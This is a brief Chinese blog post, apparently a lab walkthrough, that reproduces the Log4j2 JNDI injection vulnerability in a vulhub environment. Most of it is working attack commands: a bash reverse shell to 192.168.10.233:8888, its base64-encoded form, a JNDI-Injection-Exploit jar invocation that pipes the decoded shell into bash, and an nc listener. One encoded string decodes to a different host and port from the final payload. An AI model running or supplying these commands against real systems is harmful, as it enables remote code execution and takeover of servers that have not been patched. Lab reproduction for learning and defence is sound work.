vulhub靶场log4j2漏洞复现

嘤嘤奶嘴酱2024-09-09 1:38

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问

相关推荐
张文君21 分钟前
上古世纪服务端编译安装AAEmu docker编译安装
运维·docker·容器
蜡笔婧萱27 分钟前
Linux--远程登录服务ssh
linux·服务器·ssh
雾岛心情36 分钟前
小铭邮件管理工具箱的界面(公司版)
运维·服务器·工具·o365·小铭邮件工具箱(公司版)
一只鹿鹿鹿39 分钟前
数据库运维与管理规范(WORD)
运维·数据库
伏加特遇上西柚1 小时前
Loki+Alloy+Grafana日志采集部署
java·linux·服务器·spring boot·grafana·prometheus
zl_dfq1 小时前
服务器设计细节 之 【eventfd、struct stat、stat接口】
服务器
King's King1 小时前
自动化立体仓库系统项目施工要点
运维·自动化
资源分享助手1 小时前
三网H5小游戏战车向前冲搭建教程(Win+Linux)
linux·运维·服务器
无限进步_1 小时前
Linux权限模型:从rwx到粘滞位
linux·运维·服务器
似是燕归来1 小时前
WiFi 模块自动联网自带MQTT协议栈和云服务器串口透传免AT开发
服务器·esp32·wifi模块·mqtt协议
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03零基础教你claude code 接入 deepseek V404CC-Switch & Claude 基于 Linux 服务器安装使用指南05【AI】2026 年具身智能模型和世界模型总结06要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法07Windows端Codex接入第三方模型(DeekSeek,BaiLian)08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么102026年AI前瞻:量子AI、具身智能与科学发现的新纪元